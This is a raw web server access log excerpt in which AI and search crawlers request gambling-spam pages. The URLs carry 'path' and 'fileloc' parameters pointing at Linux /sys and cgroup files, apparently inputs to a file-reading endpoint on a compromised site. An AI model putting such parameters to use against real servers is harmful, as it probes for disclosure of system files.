44.209.187.99 - - [22/Oct/2025:00:35:12 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/fs/cgroup/system.slice/multipathd.service/cgroup.procs&path=//sys/fs/cgroup/system.slice/multipathd.service HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:12 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2FttyS24%2Fsubsystem%2Ftty45 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:13 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2FttyS24%2Fsubsystem%2Ftty45 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2FttyS24%2Fsubsystem%2Ftty45" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:13 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/sr0/queue HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:35:14 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/subsystem/vda/subsystem/loop3/subsystem/loop6/trace HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
